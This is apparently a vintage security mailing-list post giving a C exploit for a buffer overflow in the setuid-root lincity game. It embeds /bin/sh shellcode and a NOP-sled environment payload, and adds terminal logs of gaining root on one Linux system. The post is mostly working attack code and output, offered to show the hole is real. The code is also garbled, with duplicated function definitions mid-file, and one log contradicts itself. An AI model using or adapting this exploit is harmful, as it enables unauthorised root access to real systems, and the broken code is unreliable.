In reply to TFreak answer: I think IT IS dangerous. Observe: First we present owr anfitrion: --------------------------- lincityxpl.c --------------------------------- #include <stdio.h> #include <stdlib.h> #define HOMESIZE 500 #define HUEVOSIZE 5000 char *shell = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; long esp(void) { __asm__("movl %esp,%eax\n"); } int main(void) { char *ptr, *bof, *egg; long *addr_ptr, addr; int i; if ( !(bof = malloc(HOMESIZE)) ) { printf("NoMoreMemory4bof.\n"); exit(1); } if ( !(egg = malloc(HUEVOSIZE)) ) { printf("NoMoreMemory4egg.\n"); exit(1); } long esp(void) { __asm__("movl %esp,%eax\n"); } int main(void) { char *ptr, *bof, *egg; long *addr_ptr, addr; int i; if ( !(bof = malloc(HOMESIZE)) ) { printf("NoMoreMemory4bof.\n"); exit(1); } if ( !(egg = malloc(HUEVOSIZE)) ) { printf("NoMoreMemory4egg.\n"); exit(1); } addr = esp(); addr_ptr = (long *) bof; for (i = 0; i < HOMESIZE; i += 4) *(addr_ptr++) = addr; ptr = egg; for (i = 0; i <= HUEVOSIZE - strlen(shell) - 2; i++) *(ptr++) = 0x90; for( i = 0; i < strlen(shell); i++) *(ptr++) = shell[i]; printf("Address:\t0x%x\n", addr); bof[HOMESIZE - 1] = '\0'; egg[HUEVOSIZE - 1] = '\0'; memcpy(bof, "BOF=", 4); memcpy(egg , "EGG=", 4); putenv(bof); putenv(egg); system("export HOME=$BOF; /usr/games/lincity"); } ----------------------------------------------------------------------- System #1: ~~~~~~~~~~ $ cat /etc/redhat-release release 4.1 (Vanderbilt) $ uname -a Linux System1 2.0.29 #3 Thu Jun 5 16:37:15 ARST 1997 i486 $ ls -la /usr/games/lincity -rwsr-sr-x 1 root linux 793395 Mar 17 07:16 /usr/games/lincity $ ldd /usr/games/lincity libvgagl.so.1 => /usr/lib/libvgagl.so.1.2.10 libvga.so.1 => /usr/lib/libvga.so.1.2.10 libg++.so.27 => /usr/lib/libg++.so.27.1.4 libstdc++.so.27 => /usr/lib/libstdc++.so.27.1.4 libm.so.5 => /lib/libm.so.5.0.6 libc.so.5 => 
/lib/libc.so.5.3.12 $ cc -o fl lincityxpl.c $ id uid=500(bst) gid=500(bst) groups=500(bst) $ ./fl Address: 0xbffffd4c bash# id uid=500(bst) gid=500(bst) euid=0(root) egid=0(linux) groups=500(bst) bash# System #2: ~~~~~~~~~~ $ cat /etc/redhat-release release 4.2 (Biltmore) $ uname -a Linux System2 2.0.33 #4 Thu Jan 15 08:49:37 GMT 1998 i586 unknown $ ls -la /usr/games/lincity -rwsr-sr-x 1 root root 794612 Mar 17 09:22 /usr/games/lincity $ ldd /usr/games/lincity libvgagl.so.1 => /usr/lib/libvgagl.so.1 (0x4000a000) libvga.so.1 => /usr/lib/libvga.so.1 (0x40017000) libg++.so.27 => /usr/lib/libg++.so.27 (0x40046000) libstdc++.so.27 => /usr/lib/libstdc++.so.27 (0x40079000) libm.so.5 => /lib/libm.so.5 (0x400a8000) libc.so.5 => /lib/libc.so.5 (0x400b0000) $ id uid=501(rewt) gid=502(rewt) groups=100(users),502(rewt) $ ls -la /usr/lib/libsvga*.so.* -rwxr-xr-x 1 root bin 182356 Sep 2 1996 /usr/lib/libvga.so.1.2.10 -rwxr-xr-x 1 root bin 46548 Sep 2 1996 /usr/lib/libvgagl.so.1.2.10 $ cc -o fl lincityxpl.c $ id uid=500(bst) gid=500(bst) groups=500(bst) $ ./fl Address: 0xbffffdd2f sh-2.01$ id uid=500(bst) gid=500(bst) groups=500(bst) Well, as you can see, the *vga* libs are the same. Please mail me with your conclusions. Bst.